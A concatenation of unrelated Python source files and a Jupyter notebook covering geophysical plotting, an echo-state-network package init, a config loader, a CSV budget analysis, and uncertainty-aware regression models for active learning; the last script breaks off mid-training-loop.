          label=r'Resistivity (${\tt resInv}$) in $\Omega$m', savefig='invERT')
showModel(axs[6], velInv, pMesh, 0, cMin=1000, cMax=2500,
          label=r'Velocity (${\tt velInv}$) in m$/$s', savefig='invTT')
showModel(axs[3], satERT, pMesh,
          label=r'Saturation (${\tt satERT}$)', savefig='invERTPetro')
showModel(axs[7], satTT, pMesh,
          label=r'Saturation (${\tt satTT}$)', savefig='invTTPetro')
showModel(axs[4], satJoint, pMesh,
          label=r'Saturation (${\tt satJoint}$)', savefig='invJointPetro')
# just hold figure windows open if run outside from spyder, ipython or similar
pg.wait()
|
# Package public API: echo-state-network (reservoir) models and the
# linear readout layer.
from .esn import ESNBase, LeakyESN, MultiringESN
from .readout import Linear
# Names exported by ``from <package> import *``.
__all__ = ['ESNBase', 'LeakyESN', 'MultiringESN', 'Linear']
|
from typing import Dict
from modularconfig.errors import LoadingError
# Loader registry metadata: the primary datatype name and its accepted aliases.
name = "int"
aliases = ["integer"]
def load(text: str, options: Dict[str, str]) -> int:
    """Parse the given text as a base-10 integer.

    The surrounding whitespace is ignored; ``options`` is accepted for
    loader-interface compatibility and is not used.

    Raises:
        LoadingError: if the text is not a valid integer literal.
    """
    stripped = text.strip()
    try:
        return int(stripped)
    except ValueError as e:
        raise LoadingError("Can't convert to an integer") from e
{
"cells": [
{
"cell_type": "code",
"execution_count": 1,
"id": "5e57b953-5f8d-42f1-9cf6-88c1e2aa89c5",
"metadata": {},
"outputs": [],
"source": [
"import os\n",
"import csv\n",
"\n",
"#Creates file path\n",
"budget_csv = os.path.join(\".\", \"budget_data.csv\")\n"
]
},
{
"cell_type": "code",
"execution_count": 2,
"id": "68c980c2-b53d-43bd-bed4-dc5a825d009d",
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"<_csv.reader object at 0x000002C3367250A0>\n",
"CSV Header: ['Date', 'Profit/Losses']\n"
]
}
],
"source": [
    "# Opening file\n",
"with open(budget_csv) as csvfile:\n",
"\n",
" # CSV reader specifies delimiter and variable that holds contents\n",
" csvreader = csv.reader(csvfile, delimiter=',')\n",
" print(csvreader)\n",
"\n",
" # Read the header row first \n",
" csv_header = next(csvreader)\n",
" print(f\"CSV Header: {csv_header}\")\n",
"\n",
" date_lst = []\n",
" lose_prof_lst = []\n",
" \n",
" # Read each row of data after the header\n",
" for row in csvreader:\n",
" date = row[0]\n",
" date_lst.append(date) # adding the element to the date list\n",
" \n",
" lose_prof = float(row[1]) \n",
" lose_prof_lst.append(lose_prof) # adding the element to the lose/profit list\n",
" "
]
},
{
"cell_type": "code",
"execution_count": 3,
"id": "07c3b897-dc72-401b-8f4b-ff2550b4b708",
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"['Jan-2010', 'Feb-2010', 'Mar-2010', 'Apr-2010', 'May-2010', 'Jun-2010', 'Jul-2010', 'Aug-2010', 'Sep-2010', 'Oct-2010', 'Nov-2010', 'Dec-2010', 'Jan-2011', 'Feb-2011', 'Mar-2011', 'Apr-2011', 'May-2011', 'Jun-2011', 'Jul-2011', 'Aug-2011', 'Sep-2011', 'Oct-2011', 'Nov-2011', 'Dec-2011', 'Jan-2012', 'Feb-2012', 'Mar-2012', 'Apr-2012', 'May-2012', 'Jun-2012', 'Jul-2012', 'Aug-2012', 'Sep-2012', 'Oct-2012', 'Nov-2012', 'Dec-2012', 'Jan-2013', 'Feb-2013', 'Mar-2013', 'Apr-2013', 'May-2013', 'Jun-2013', 'Jul-2013', 'Aug-2013', 'Sep-2013', 'Oct-2013', 'Nov-2013', 'Dec-2013', 'Jan-2014', 'Feb-2014', 'Mar-2014', 'Apr-2014', 'May-2014', 'Jun-2014', 'Jul-2014', 'Aug-2014', 'Sep-2014', 'Oct-2014', 'Nov-2014', 'Dec-2014', 'Jan-2015', 'Feb-2015', 'Mar-2015', 'Apr-2015', 'May-2015', 'Jun-2015', 'Jul-2015', 'Aug-2015', 'Sep-2015', 'Oct-2015', 'Nov-2015', 'Dec-2015', 'Jan-2016', 'Feb-2016', 'Mar-2016', 'Apr-2016', 'May-2016', 'Jun-2016', 'Jul-2016', 'Aug-2016', 'Sep-2016', 'Oct-2016', 'Nov-2016', 'Dec-2016', 'Jan-2017', 'Feb-2017']\n",
"[867884.0, 984655.0, 322013.0, -69417.0, 310503.0, 522857.0, 1033096.0, 604885.0, -216386.0, 477532.0, 893810.0, -80353.0, 779806.0, -335203.0, 697845.0, 793163.0, 485070.0, 584122.0, 62729.0, 668179.0, 899906.0, 834719.0, 132003.0, 309978.0, -755566.0, 1170593.0, 252788.0, 1151518.0, 817256.0, 570757.0, 506702.0, -1022534.0, 475062.0, 779976.0, 144175.0, 542494.0, 359333.0, 321469.0, 67780.0, 471435.0, 565603.0, 872480.0, 789480.0, 999942.0, -1196225.0, 268997.0, -687986.0, 1150461.0, 682458.0, 617856.0, 824098.0, 581943.0, 132864.0, 448062.0, 689161.0, 800701.0, 1166643.0, 947333.0, 578668.0, 988505.0, 1139715.0, 1029471.0, 687533.0, -524626.0, 158620.0, 87795.0, 423389.0, 840723.0, 568529.0, 332067.0, 989499.0, 778237.0, 650000.0, -1100387.0, -174946.0, 757143.0, 445709.0, 712961.0, -1163797.0, 569899.0, 768450.0, 102685.0, 795914.0, 60988.0, 138230.0, 671099.0]\n"
]
}
],
"source": [
"# Check the lists \n",
"print(date_lst)\n",
"print(lose_prof_lst)\n"
]
},
{
"cell_type": "code",
"execution_count": 4,
"id": "0c3ae3a1-a958-4e6c-8467-ff1f77ac0ace",
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"[116771.0, -662642.0, -391430.0, 379920.0, 212354.0, 510239.0, -428211.0, -821271.0, 693918.0, 416278.0, -974163.0, 860159.0, -1115009.0, 1033048.0, 95318.0, -308093.0, 99052.0, -521393.0, 605450.0, 231727.0, -65187.0, -702716.0, 177975.0, -1065544.0, 1926159.0, -917805.0, 898730.0, -334262.0, -246499.0, -64055.0, -1529236.0, 1497596.0, 304914.0, -635801.0, 398319.0, -183161.0, -37864.0, -253689.0, 403655.0, 94168.0, 306877.0, -83000.0, 210462.0, -2196167.0, 1465222.0, -956983.0, 1838447.0, -468003.0, -64602.0, 206242.0, -242155.0, -449079.0, 315198.0, 241099.0, 111540.0, 365942.0, -219310.0, -368665.0, 409837.0, 151210.0, -110244.0, -341938.0, -1212159.0, 683246.0, -70825.0, 335594.0, 417334.0, -272194.0, -236462.0, 657432.0, -211262.0, -128237.0, -1750387.0, 925441.0, 932089.0, -311434.0, 267252.0, -1876758.0, 1733696.0, 198551.0, -665765.0, 693229.0, -734926.0, 77242.0, 532869.0]\n"
]
}
],
"source": [
"# Calculate change\n",
"# help from https://www.w3schools.com/python/python_lists_loop.asp\n",
"difference = []\n",
"i = 1\n",
"while i < len(lose_prof_lst):\n",
" diff = lose_prof_lst[i]-lose_prof_lst[i-1]\n",
" difference.append(diff)\n",
" i = i + 1\n",
"\n",
"# Check the lists \n",
"print(difference)\n"
]
},
{
"cell_type": "code",
"execution_count": 5,
"id": "006847b7-e753-4c7e-83b5-e747d6ca3090",
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"Feb-2012 $1,926,159.00\n"
]
}
],
"source": [
"# Calculate greatest increase\n",
"great_increase_index = difference.index(max(difference))\n",
"great_increase_month = date_lst[great_increase_index+1]\n",
"\n",
"# '${:,.2f}'.format(amount) formats value; source: https://stackoverflow.com/questions/21208376/converting-float-to-dollars-and-cents\n",
"great_increase = '${:,.2f}'.format(max(difference))\n",
"\n",
"# Checking values\n",
"print(great_increase_month, great_increase)"
]
},
{
"cell_type": "code",
"execution_count": 6,
"id": "246340e4-36b8-4f67-a931-2e5237da65ed",
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"Sep-2013 $-2,196,167.00\n"
]
}
],
"source": [
"# Calculate greatest decrease\n",
"great_decrease_index = difference.index(min(difference))\n",
"great_decrease_month = date_lst[great_decrease_index+1]\n",
"\n",
"# '${:,.2f}'.format(amount) formats value; source: https://stackoverflow.com/questions/21208376/converting-float-to-dollars-and-cents\n",
"great_decrease = '${:,.2f}'.format(min(difference))\n",
"\n",
"# Checking values\n",
"print(great_decrease_month, great_decrease)"
]
},
{
"cell_type": "code",
"execution_count": 7,
"id": "03ab3661-c08f-4b9b-82f4-d50d6294ba73",
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"Financial Analysis\n",
"--------------------------------\n",
"Total months: 86\n",
"Total: $38,382,578.00\n",
"Average Change: $-2,315.12\n",
"Greatest Increase in Profits: Feb-2012, $1,926,159.00\n",
"Greatest Decrease in Profits: Sep-2013, $-2,196,167.00\n"
]
}
],
"source": [
"# Analysis\n",
"# title \n",
"print(\"Financial Analysis\")\n",
"print(\"--------------------------------\") \n",
"\n",
"# Total months\n",
"total_mon = len(date_lst)\n",
"print(f\"Total months: {total_mon}\")\n",
"\n",
"# Total net profit\n",
"# '${:,.2f}'.format(amount) formats value; source: https://stackoverflow.com/questions/21208376/converting-float-to-dollars-and-cents\n",
"total = '${:,.2f}'.format(sum(lose_prof_lst)) \n",
"print(f\"Total: {total}\")\n",
"\n",
"# Average change\n",
"avg_change = round(sum(difference)/len(difference), 2)\n",
"format_avg = '${:,.2f}'.format(avg_change)\n",
"print(f\"Average Change: {format_avg}\")\n",
"\n",
"# Greatest increase in profits\n",
"print(f\"Greatest Increase in Profits: {great_increase_month}, {great_increase}\")\n",
"\n",
    "# Greatest decrease in profits\n",
"print(f\"Greatest Decrease in Profits: {great_decrease_month}, {great_decrease}\")"
]
},
{
"cell_type": "code",
"execution_count": 8,
"id": "5ad2eea6-fbca-47fe-bc2b-ba8244b957c3",
"metadata": {},
"outputs": [],
"source": [
"# Export Financial Analysis\n",
"# Specify the file to write to\n",
"output_path = os.path.join(\".\", \"financial_analysis.csv\")\n",
"\n",
"# Open the file using \"write\" mode. Specify the variable to hold the contents\n",
"with open(output_path, 'w', newline='') as csvfile:\n",
"\n",
" # Initialize csv.writer\n",
" csvwriter = csv.writer(csvfile, delimiter=',')\n",
" \n",
" # Write column headers\n",
" csvwriter.writerow(['Financial Analysis', ''])\n",
" \n",
" # Write the first row \n",
" csvwriter.writerow(['Total months: ', total_mon])\n",
"\n",
" # Write the second row\n",
" csvwriter.writerow(['Total:', total])\n",
" \n",
" # Write the third row\n",
" csvwriter.writerow(['Average Change:', format_avg])\n",
" \n",
" # Write the fourth row\n",
" csvwriter.writerow(['Greatest Increase in Profits:', great_increase_month, great_increase])\n",
" \n",
" # Write the fifth row\n",
    " csvwriter.writerow(['Greatest Decrease in Profits:', great_decrease_month, great_decrease])"
]
},
{
"cell_type": "code",
"execution_count": null,
"id": "55080fa9-c7dc-42d1-b751-b931f8c84e9e",
"metadata": {},
"outputs": [],
"source": []
}
],
"metadata": {
"kernelspec": {
"display_name": "Python 3",
"language": "python",
"name": "python3"
},
"language_info": {
"codemirror_mode": {
"name": "ipython",
"version": 3
},
"file_extension": ".py",
"mimetype": "text/x-python",
"name": "python",
"nbconvert_exporter": "python",
"pygments_lexer": "ipython3",
"version": "3.8.8"
}
},
"nbformat": 4,
"nbformat_minor": 5
}
|
from typing import List
from tkdet.utils.registry import Registry
from .base import Neck
from typing import Union
# Names exported by this module.
__all__ = [
    "NECK_REGISTRY",
    "build_neck",
    "get_neck_list",
]
# Global registry mapping neck names to their classes; necks register
# themselves here so build_neck can look them up by cfg.MODEL.NECK.NAME.
NECK_REGISTRY = Registry("NECK")
def build_neck(cfg, input_shape) -> Union[Neck, None]:
    """Instantiate the neck named in cfg.MODEL.NECK, or None when disabled."""
    if not cfg.MODEL.NECK.ENABLE:
        return None
    neck_cls = NECK_REGISTRY.get(cfg.MODEL.NECK.NAME)
    built = neck_cls(cfg, input_shape)
    # Every registered neck must derive from the Neck base class.
    assert isinstance(built, Neck)
    return built
def get_neck_list() -> List[str]:
    """Return the names of all registered necks, in registration order."""
    return [neck_name for neck_name in NECK_REGISTRY.keys()]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu May 2 11:29:39 2019
@author: nsde
"""
#%%
import torch
from sklearn import preprocessing
from sklearn.model_selection import train_test_split
import numpy as np
import argparse, math, os, time
from tqdm import tqdm
from itertools import chain
from utils import timer, batchify, normalize_y, normal_log_prob, RBF, \
Norm2, OneMinusX, PosLinear, Reciprocal, normal_log_prob_w_prior, t_likelihood
#%%
def _str2bool(value):
    """Parse a command-line boolean; plain bool() would make '--flag False' truthy."""
    if isinstance(value, bool):
        return value
    lowered = value.strip().lower()
    if lowered in ('1', 'true', 't', 'yes', 'y'):
        return True
    if lowered in ('0', 'false', 'f', 'no', 'n'):
        return False
    raise argparse.ArgumentTypeError("expected a boolean value, got %r" % value)
def argparser(parser=None):
    """Build the CLI parser (or extend a caller-supplied one) and parse sys.argv.

    Parameters
    ----------
    parser : argparse.ArgumentParser, optional
        Existing parser to extend; a fresh one is created when None.

    Returns
    -------
    argparse.Namespace
        General settings (model, dataset, seed, ...) and model-specific
        settings (batch_size, lr, iters, ...).
    """
    if parser is None:
        parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    gs = parser.add_argument_group('General settings')
    gs.add_argument('--model', type=str, default='john', help='model to use')
    # Only add --dataset when the caller's parser does not already define it.
    # parse_known_args (not parse_args) so options that are not registered yet
    # at this point do not abort the program with a SystemExit.
    if 'dataset' not in parser.parse_known_args()[0]:
        gs.add_argument('--dataset', type=str, default='boston', help='dataset to use')
    gs.add_argument('--seed', type=int, default=1, help='random state of data-split')
    gs.add_argument('--repeats', type=int, default=10, help='number of repeatitions')
    # type=_str2bool (not bool): bool('False') is True, so these flags could
    # previously never be switched off from the command line.
    gs.add_argument('--silent', type=_str2bool, default=True, help='suppress warnings')
    gs.add_argument('--cuda', type=_str2bool, default=True, help='use cuda')
    gs.add_argument('--sample_size', type=float, default=0.01, help='fraction of pool to add after each iteration')
    gs.add_argument('--al_iters', type=int, default=10, help='number of AL iterations')
    ms = parser.add_argument_group('Model specific settings')
    ms.add_argument('--batch_size', type=int, default=512, help='batch size')
    ms.add_argument('--shuffel', type=_str2bool, default=True, help='shuffel data during training')
    ms.add_argument('--lr', type=float, default=1e-4, help='learning rate')
    ms.add_argument('--iters', type=int, default=1000, help='number of iterations')
    ms.add_argument('--mcmc', type=int, default=100, help='number of mcmc samples')
    ms.add_argument('--inducing', type=int, default=500, help='number of inducing points')
    ms.add_argument('--n_clusters', type=int, default=500, help='number of cluster centers')
    ms.add_argument('--n_models', type=int, default=5, help='number of ensemble')
    # Parse and return
    args = parser.parse_args()
    return args
#%%
def gp(args, X, y, Xpool, ypool, Xtest, ytest):
    """Fit an exact GP (GPy, RBF-ARD kernel) and score it on the test set.

    Returns (test mean log-density, test RMSE, pool means, pool variances);
    all NaN when the training set is too large for exact inference.
    """
    # Exact GP inference scales cubically; skip datasets above 2000 points.
    if X.shape[0] > 2000:  # do not run gp for large datasets
        return np.nan, np.nan, np.nan, np.nan
    import GPy
    n_features = X.shape[1]
    kern = GPy.kern.RBF(n_features, ARD=True)
    gp_model = GPy.models.GPRegression(X, y.reshape(-1, 1), kern, normalizer=True)
    gp_model.constrain_positive(' ')  # ensure positive hyperparameters
    gp_model.optimize()
    # Pool moments drive the active-learning acquisition in the caller.
    pool_mean, pool_var = gp_model.predict(Xpool)
    # Full test covariance (plus jitter) for the joint log-density.
    test_mean, test_cov = gp_model.predict(Xtest, full_cov=True)
    test_cov += 1e-4 * np.diag(np.ones(test_cov.shape[0]))
    test_mean = test_mean.flatten()
    residual = ytest - test_mean
    log_px = -1 / 2 * (np.linalg.slogdet(test_cov)[1]
                       + residual.T.dot(np.linalg.inv(test_cov).dot(residual))
                       + n_features * math.log(2 * math.pi)) / Xtest.shape[0]
    rmse = math.sqrt(((ytest - test_mean) ** 2).mean())
    return log_px, rmse, pool_mean.flatten(), pool_var.flatten()
#%%
def nn(args, X, y, Xpool, ypool, Xtest, ytest):
    """Train a mean/variance MLP and score it on the test set.

    Returns (test mean log-density, test RMSE, pool means, pool variances);
    the pool moments are consumed by the caller's acquisition step.
    """
    # Wider hidden layer for the two largest datasets.
    if args.dataset == 'protein' or args.dataset == 'year_prediction':
        n_neurons = 100
    else:
        n_neurons = 50
    # Standardize targets for training; predictions are rescaled back below.
    y, y_mean, y_std = normalize_y(y)
    # Two separate heads: a mean network and a (Softplus-positive) variance network.
    mean = torch.nn.Sequential(torch.nn.Linear(X.shape[1], n_neurons),
                               torch.nn.ReLU(),
                               torch.nn.Linear(n_neurons, 1))
    var = torch.nn.Sequential(torch.nn.Linear(X.shape[1], n_neurons),
                              torch.nn.ReLU(),
                              torch.nn.Linear(n_neurons, 1),
                              torch.nn.Softplus())
    if torch.cuda.is_available() and args.cuda:
        mean.cuda(); var.cuda();
        device=torch.device('cuda')
    else:
        device=torch.device('cpu')
    optimizer = torch.optim.Adam(chain(mean.parameters(),
                                       var.parameters()), lr=args.lr)
    it = 0
    progressBar = tqdm(desc='Training nn', total=args.iters, unit='iter')
    batches = batchify(X, y, batch_size = args.batch_size, shuffel=args.shuffel)
    while it < args.iters:
        # Warm-up: for the first half of training the variance head is ignored
        # and a small fixed variance (0.02**2) is used instead.
        switch = 1.0 if it > args.iters/2 else 0.0
        optimizer.zero_grad()
        data, label = next(batches)
        data = torch.tensor(data).to(torch.float32).to(device)
        label = torch.tensor(label).to(torch.float32).to(device)
        m, v = mean(data), var(data)
        v = switch*v + (1-switch)*torch.tensor([0.02**2], device=device)
        # Maximize Gaussian log-likelihood (minimize its negation).
        loss = normal_log_prob(label, m, v).sum()
        (-loss).backward()
        optimizer.step()
        it+=1
        progressBar.update()
        progressBar.set_postfix({'loss': loss.item()})
    progressBar.close()
    with torch.no_grad():
        # Pool moments, rescaled to the original target units.
        data = torch.tensor(Xpool).to(torch.float32).to(device)
        label = torch.tensor(ypool).to(torch.float32).to(device)
        m, v = mean(data), var(data)
        pool_m = m * y_std + y_mean
        pool_v = v * y_std**2
        # Test-set moments and metrics, also in original units.
        data = torch.tensor(Xtest).to(torch.float32).to(device)
        label = torch.tensor(ytest).to(torch.float32).to(device)
        m, v = mean(data), var(data)
        m = m * y_std + y_mean
        v = v * y_std**2
        test_log_px = normal_log_prob(label, m, v)
        test_rmse = ((label - m.flatten())**2).mean().sqrt()
    return test_log_px.mean().item(), \
           test_rmse.item(), \
           pool_m.cpu().flatten().numpy(), \
           pool_v.cpu().flatten().numpy()
#%%
def mcdnn(args, X, y, Xpool, ypool, Xtest, ytest):
    """Train an MC-dropout MLP and score it on the test set.

    The network is trained with an L2 loss; predictive moments are obtained
    by averaging args.mcmc stochastic forward passes with dropout active.

    Returns (test mean log-density, test RMSE, pool means, pool variances);
    the pool moments are consumed by the caller's acquisition step.
    """
    # Wider hidden layer for the two largest datasets.
    if args.dataset == 'protein' or args.dataset == 'year_prediction':
        n_neurons = 100
    else:
        n_neurons = 50
    mean = torch.nn.Sequential(torch.nn.Linear(X.shape[1], n_neurons),
                               torch.nn.Dropout(p=0.1),
                               torch.nn.ReLU(),
                               torch.nn.Linear(n_neurons, 1),
                               torch.nn.Dropout(p=0.1))
    if torch.cuda.is_available() and args.cuda:
        mean.cuda()
        device = torch.device('cuda')
    else:
        device = torch.device('cpu')
    optimizer = torch.optim.Adam(mean.parameters(), lr=args.lr)
    it = 0
    progressBar = tqdm(desc='Training nn', total=args.iters, unit='iter')
    batches = batchify(X, y, batch_size = args.batch_size, shuffel=args.shuffel)
    while it < args.iters:
        optimizer.zero_grad()
        data, label = next(batches)
        data = torch.tensor(data).to(torch.float32).to(device)
        label = torch.tensor(label).to(torch.float32).to(device)
        m = mean(data)
        # Squared-error loss (written as |.|^2).
        loss = (m - label).abs().pow(2.0).mean()
        loss.backward()
        optimizer.step()
        it+=1
        progressBar.update()
        progressBar.set_postfix({'loss': loss.item()})
    progressBar.close()
    with torch.no_grad():
        # NOTE: the network is deliberately left in train mode so dropout
        # stays active -- that is what makes the MC forward passes stochastic.
        data = torch.tensor(Xpool).to(torch.float32).to(device)
        samples = torch.zeros(Xpool.shape[0], args.mcmc).to(device)
        for i in range(args.mcmc):
            samples[:,i] = mean(data).flatten()
        pool_m, pool_v = samples.mean(dim=1), samples.var(dim=1)
        # BUG FIX: the original evaluated "test" metrics on Xpool/ypool a
        # second time; score on the held-out Xtest/ytest as the other
        # model functions (nn, ensnn) do.
        data = torch.tensor(Xtest).to(torch.float32).to(device)
        label = torch.tensor(ytest).to(torch.float32).to(device)
        samples = torch.zeros(Xtest.shape[0], args.mcmc).to(device)
        for i in range(args.mcmc):
            samples[:,i] = mean(data).flatten()
        m, v = samples.mean(dim=1), samples.var(dim=1)
        test_log_px = normal_log_prob(label, m, v)
        test_rmse = ((label - m.flatten())**2).mean().sqrt()
    return test_log_px.mean().item(), \
           test_rmse.item(), \
           pool_m.cpu().flatten().numpy(), \
           pool_v.cpu().flatten().numpy()
#%%
def ensnn(args, X, y, Xpool, ypool, Xtest, ytest):
    """Train an ensemble of mean/variance MLPs and score it on the test set.

    Each of args.n_models members is trained independently (random init);
    ensemble moments are combined with the law of total variance.

    Returns (test mean log-density, test RMSE, pool means, pool variances).
    """
    # Wider hidden layer for the two largest datasets.
    if args.dataset == 'protein' or args.dataset == 'year_prediction':
        n_neurons = 100
    else:
        n_neurons = 50
    # Standardize targets for training; predictions are rescaled back below.
    y, y_mean, y_std = normalize_y(y)
    # Per-member pool/test means and variances, stacked after the loop.
    ms_pool, vs_pool, ms, vs = [ ], [ ], [ ], [ ]
    # NOTE: the loop variable m is shadowed by the batch predictions below;
    # it is only used to repeat the training n_models times.
    for m in range(args.n_models): # initialize differently
        mean = torch.nn.Sequential(torch.nn.Linear(X.shape[1], n_neurons),
                                   torch.nn.ReLU(),
                                   torch.nn.Linear(n_neurons, 1))
        var = torch.nn.Sequential(torch.nn.Linear(X.shape[1], n_neurons),
                                  torch.nn.ReLU(),
                                  torch.nn.Linear(n_neurons, 1),
                                  torch.nn.Softplus())
        if torch.cuda.is_available() and args.cuda:
            mean.cuda(); var.cuda();
            device=torch.device('cuda')
        else:
            device=torch.device('cpu')
        optimizer = torch.optim.Adam(chain(mean.parameters(),
                                           var.parameters()), lr=args.lr)
        it = 0
        progressBar = tqdm(desc='Training nn', total=args.iters, unit='iter')
        batches = batchify(X, y, batch_size = args.batch_size, shuffel=args.shuffel)
        while it < args.iters:
            # Warm-up: fixed small variance for the first half of training.
            switch = 1.0 if it > args.iters/2 else 0.0
            optimizer.zero_grad()
            data, label = next(batches)
            data = torch.tensor(data).to(torch.float32).to(device)
            label = torch.tensor(label).to(torch.float32).to(device)
            m, v = mean(data), var(data)
            v = switch*v + (1-switch)*torch.tensor([0.02**2], device=device)
            loss = normal_log_prob(label, m, v).sum()
            (-loss).backward()
            optimizer.step()
            it+=1
            progressBar.update()
            progressBar.set_postfix({'loss': loss.item()})
        progressBar.close()
        with torch.no_grad():
            # Member moments on pool and test sets, in original target units.
            data = torch.tensor(Xpool).to(torch.float32).to(device)
            label = torch.tensor(ypool).to(torch.float32).to(device)
            m, v = mean(data), var(data)
            pool_m = m * y_std + y_mean
            pool_v = v * y_std**2
            data = torch.tensor(Xtest).to(torch.float32).to(device)
            label = torch.tensor(ytest).to(torch.float32).to(device)
            m, v = mean(data), var(data)
            m = m * y_std + y_mean
            v = v * y_std**2
        ms_pool.append(pool_m)
        vs_pool.append(pool_v)
        ms.append(m)
        vs.append(v)
    ms_pool = torch.stack(ms_pool)
    vs_pool = torch.stack(vs_pool)
    ms = torch.stack(ms)
    vs = torch.stack(vs)
    # Mixture moments: mean of means; variance via E[v + m^2] - (E[m])^2.
    pool_m = ms_pool.mean(dim=0)
    pool_v = (vs_pool + ms_pool**2).mean(dim=0) - pool_m**2
    m = ms.mean(dim=0)
    v = (vs + ms**2).mean(dim=0) - m**2
    # label still holds the test targets from the last member's evaluation.
    test_log_px = normal_log_prob(label, m, v)
    test_rmse = ((label - m.flatten())**2).mean().sqrt()
    return test_log_px.mean().item(), \
           test_rmse.item(), \
           pool_m.cpu().flatten().numpy(), \
           pool_v.cpu().flatten().numpy()
#%%
def john(args, X, y, Xpool, ypool, Xtest, ytest):
    """Train the 'john' model: an MLP mean with a Gamma-parameterized variance
    head that is blended toward the prior variance far from the training data
    (distance to KMeans cluster centers through a translated sigmoid).

    Trained with the locality sampler and a Student-t style likelihood
    (t_likelihood from utils). Returns the best validation log-likelihood,
    the matching RMSE, and (mean, variance) estimates on the test and pool
    sets, all in original target units.
    """
    from sklearn.cluster import KMeans
    from utils import dist
    from itertools import chain
    from torch import distributions as D
    from locality_sampler import gen_Qw, locality_sampler2
    # Wider hidden layer for the two largest datasets.
    if args.dataset == 'protein' or args.dataset == 'year_prediction':
        n_neurons = 100
    else:
        n_neurons = 50
    args.n_clusters = min(args.n_clusters, X.shape[0])
    # Standardize targets; predictions are rescaled back before scoring.
    y, y_mean, y_std = normalize_y(y)
    # Locality-sampler settings (psu/ssu/M) for the mean and variance phases.
    mean_psu = 1
    mean_ssu = 50
    mean_M = 60
    var_psu = 2
    var_ssu = 10
    var_M = 15
    # Number of Gamma samples per forward pass during training.
    num_draws_train = 20
    # Cluster centers act as a compact summary of the training inputs;
    # distance to them decides how much the prior variance dominates.
    kmeans = KMeans(n_clusters=args.n_clusters)
    if args.dataset != 'year_prediction':
        kmeans.fit(np.concatenate([X], axis=0))
    else:
        # year_prediction is too large; fit on a random 10k subsample.
        kmeans.fit(X[np.random.randint(0, X.shape[0], size=(10000))])
    c = torch.tensor(kmeans.cluster_centers_, dtype=torch.float32)
    if torch.cuda.is_available() and args.cuda:
        c = torch.tensor(c).to(torch.float32).to('cuda')
    else:
        c = torch.tensor(c).to(torch.float32)
    class translatedSigmoid(torch.nn.Module):
        # Sigmoid with a learned softness beta and a fixed negative shift,
        # mapping distance-to-data to a [0, 1] blending weight.
        def __init__(self):
            super(translatedSigmoid, self).__init__()
            self.beta = torch.nn.Parameter(torch.tensor([1.5]))
        def forward(self, x):
            beta = torch.nn.functional.softplus(self.beta)
            alpha = -beta*(6.9077542789816375)
            return torch.sigmoid((x+alpha)/beta)
    class GPNNModel(torch.nn.Module):
        # Mean head plus Gamma (alpha, beta) heads for the precision; the
        # predictive variance is blended toward y_std**2 far from the data.
        def __init__(self):
            super(GPNNModel, self).__init__()
            self.mean = torch.nn.Sequential(torch.nn.Linear(X.shape[1], n_neurons),
                                            torch.nn.ReLU(),
                                            torch.nn.Linear(n_neurons, y.shape[1]))
            self.alph = torch.nn.Sequential(torch.nn.Linear(X.shape[1], n_neurons),
                                            torch.nn.ReLU(),
                                            torch.nn.Linear(n_neurons, y.shape[1]),
                                            torch.nn.Softplus())
            self.bet = torch.nn.Sequential(torch.nn.Linear(X.shape[1], n_neurons),
                                           torch.nn.ReLU(),
                                           torch.nn.Linear(n_neurons, y.shape[1]),
                                           torch.nn.Softplus())
            self.trans = translatedSigmoid()
        def forward(self, x, switch):
            # s in [0, 1]: how far x is from the nearest cluster center.
            d = dist(x, c)
            d_min = d.min(dim=1, keepdim=True)[0]
            s = self.trans(d_min)
            mean = self.mean(x)
            if switch:
                a = self.alph(x)
                b = self.bet(x)
                gamma_dist = D.Gamma(a+1e-8, 1.0/(b+1e-8))
                if self.training:
                    samples_var = gamma_dist.rsample(torch.Size([num_draws_train]))
                    x_var = (1.0/(samples_var+1e-8))
                else:
                    # More samples at evaluation time for stable moments.
                    samples_var = gamma_dist.rsample(torch.Size([1000]))
                    x_var = (1.0/(samples_var+1e-8))
                # var = (1-s) * x_var + s*torch.tensor([y_std**2], device=x.device) # HYPERPARAMETER
                var = (1-s) * x_var + s * y_std ** 2
            else:
                # Warm-up phase: fixed variance while only the mean is trained.
                var = 0.05*torch.ones_like(mean)
            return mean, var
    model = GPNNModel()
    if torch.cuda.is_available() and args.cuda:
        model.cuda()
        device=torch.device('cuda')
    else:
        device=torch.device('cpu')
    # Separate optimizers: mean head vs variance/blending parameters.
    optimizer = torch.optim.Adam(model.mean.parameters(), lr=1e-2)
    optimizer2 = torch.optim.Adam(chain(model.alph.parameters(),
                                        model.bet.parameters(),
                                        model.trans.parameters()), lr=1e-4)
    mean_Q, mean_w = gen_Qw(X, mean_psu, mean_ssu, mean_M)
    var_Q, var_w = gen_Qw(X, var_psu, var_ssu, var_M)
    #mean_pseupoch = get_pseupoch(mean_w,0.5)
    #var_pseupoch = get_pseupoch(var_w,0.5)
    opt_switch = 1
    mean_w = torch.Tensor(mean_w).to(device)
    var_w = torch.Tensor(var_w).to(device)
    model.train()
    X = torch.tensor(X).to(torch.float32).to(device)
    y = torch.tensor(y).to(torch.float32).to(device)
    batches = batchify(X, y, batch_size = args.batch_size, shuffel=args.shuffel)
    # validation data and performance measures
    ll_list = []
    mae_list = []
    rmse_list = []
    x_eval = torch.tensor(Xtest).to(torch.float32).to(device)
    y_eval = torch.tensor(ytest).to(torch.float32).to(device)
    x_pool = torch.tensor(Xpool).to(torch.float32).to(device)
    # y_pool = torch.tensor(ypool).to(torch.float32).to(device)
    y_mean = torch.tensor(y_mean).to(torch.float32).to(device)
    y_std = torch.tensor(y_std).to(torch.float32).to(device)
    it = 0
    its_per_epoch = int(np.ceil(X.shape[0] / args.batch_size))
    epochs = round(args.iters / its_per_epoch)
    while it < args.iters:
        # First half of training: mean only; second half: alternate optimizers.
        switch = 1.0 if it > args.iters/2.0 else 0.0
        if it % 11: opt_switch = opt_switch + 1 # change between var and mean optimizer
        data, label = next(batches)
        if not switch:
            optimizer.zero_grad();
            m, v = model(data, switch)
